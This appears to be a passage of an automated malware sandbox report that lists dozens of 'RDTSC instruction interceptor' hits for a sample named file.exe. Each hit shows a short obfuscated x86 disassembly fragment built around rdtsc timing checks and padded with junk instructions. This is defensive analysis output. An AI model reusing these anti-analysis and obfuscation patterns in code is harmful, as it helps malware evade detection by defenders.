                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50018 second address: E50044 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47DCFB8A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007F47DCFB8A5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47DCFB8A48h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51F52 second address: E51F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52220 second address: E52224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51F57 second address: E51F7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F47DD40FB87h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F47DD40FB78h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56B5C second address: E56B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E534CA second address: E534E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F47DD40FB78h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56B61 second address: E56BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F47DCFB8A38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jnp 00007F47DCFB8A39h 0x0000002a adc bh, 00000073h 0x0000002d mov ebx, edi 0x0000002f push 00000000h 0x00000031 jnp 00007F47DCFB8A3Bh 0x00000037 mov edi, dword ptr [ebp+122D1DB4h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F47DCFB8A38h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 sub dword ptr [ebp+122D1DC1h], esi 0x0000005f clc 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jg 00007F47DCFB8A36h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56BEB second address: E56BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E534E3 second address: E534E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E534E8 second address: E534EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57D0D second address: E57D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57D11 second address: E57D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F47DD40FB7Ch 0x00000016 jc 00007F47DD40FB76h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57D2D second address: E57D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A3Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58F29 second address: E58F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56D7E second address: E56D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5800A second address: E58010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56D82 second address: E56D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58010 second address: E5801A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E590DE second address: E59104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F47DCFB8A36h 0x00000009 jmp 00007F47DCFB8A3Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F47DCFB8A3Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D4A second address: E59D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D2EF6h] 0x00000013 push 00000000h 0x00000015 sub di, FB54h 0x0000001a push 00000000h 0x0000001c adc bx, 2800h 0x00000021 sub ebx, dword ptr [ebp+122D2CE2h] 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59ED0 second address: E59ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59ED4 second address: E59EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5BDE0 second address: E5BE20 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DCFB8A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f or dword ptr [ebp+122D2F6Dh], esi 0x00000015 push 00000000h 0x00000017 call 00007F47DCFB8A3Fh 0x0000001c and bh, 0000003Ch 0x0000001f pop ebx 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+122D2A90h], ecx 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F47DCFB8A36h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DEA2 second address: E5DEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D02E second address: E5D032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5ED26 second address: E5ED2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5ED2A second address: E5ED30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60E4D second address: E60EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F47DD40FB78h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 js 00007F47DD40FB82h 0x0000002b jmp 00007F47DD40FB7Ch 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+12449A59h], edi 0x00000039 popad 0x0000003a push 00000000h 0x0000003c cmc 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EAF second address: E60EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EB4 second address: E60EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EB9 second address: E60EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EC6 second address: E60ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60ECC second address: E60ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61EAD second address: E61EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61EB3 second address: E61F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F47DCFB8A38h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F47DCFB8A38h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov bx, ax 0x00000047 mov di, 56C5h 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61F24 second address: E61F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB80h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61F39 second address: E61F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62E8E second address: E62EA4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F47DD40FB7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62EA4 second address: E62EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62EA8 second address: E62EB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47DD40FB7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61097 second address: E610A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F47DCFB8A36h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62EB2 second address: E62F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F47DD40FB78h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 and ebx, dword ptr [ebp+122D3A3Dh] 0x00000029 call 00007F47DD40FB87h 0x0000002e sub dword ptr [ebp+122D1DE9h], edx 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 jnl 00007F47DD40FB7Bh 0x0000003e mov edi, 12C9C4F1h 0x00000043 pop edi 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 push ebx 0x00000047 push esi 0x00000048 pop esi 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E610A7 second address: E610AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E610AB second address: E610B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61173 second address: E6118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EF0F second address: E5EF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EF13 second address: E5EF19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63E0F second address: E63E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007F47DD40FB89h 0x00000011 jmp 00007F47DD40FB83h 0x00000016 nop 0x00000017 jmp 00007F47DD40FB85h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F47DD40FB78h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 add dword ptr [ebp+122D3A0Fh], ecx 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D2A58h], ecx 0x00000046 xchg eax, esi 0x00000047 jbe 00007F47DD40FB82h 0x0000004d jnl 00007F47DD40FB7Ch 0x00000053 push eax 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E620C3 second address: E620CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65278 second address: E65282 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65282 second address: E6529D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6867E second address: E68682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68682 second address: E686AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F47DCFB8A3Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jp 00007F47DCFB8A36h 0x0000001c popad 0x0000001d jc 00007F47DCFB8A38h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E66194 second address: E661AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47DD40FB7Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E686AB second address: E686C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A42h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E686C1 second address: E686C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708EC second address: E708F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708F0 second address: E7090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB83h 0x00000007 jg 00007F47DD40FB76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7090D second address: E70913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70913 second address: E70919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FFE8 second address: E6FFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FFEC second address: E7000B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F47DD40FB81h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70176 second address: E7018C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47DCFB8A36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F47DCFB8A36h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7018C second address: E70192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E702D2 second address: E702DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F47DCFB8A36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E702DE second address: E702E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E702E3 second address: E7032D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47DCFB8A60h 0x00000008 jnp 00007F47DCFB8A3Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7032D second address: E70333 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBC98 second address: DFBC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBC9E second address: DFBCA4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CDDF second address: E7CDFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47DCFB8A43h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C116 second address: E7C12E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47DD40FB7Eh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C444 second address: E7C465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F47DCFB8A4Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C59F second address: E7C5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB83h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47DD40FB88h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5D1 second address: E7C5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5D5 second address: E7C5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5DF second address: E7C5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5E3 second address: E7C5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80F07 second address: E80F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80F0D second address: E80F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87CBF second address: E87CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87CC5 second address: E87CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86AA1 second address: E86AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86AAA second address: E86AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C18 second address: E86C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C1E second address: E86C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86D48 second address: E86D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F47DCFB8A3Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86D5B second address: E86D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Dh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8716E second address: E87177 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E875E7 second address: E87608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB82h 0x00000009 jmp 00007F47DD40FB7Bh 0x0000000e rdtsc
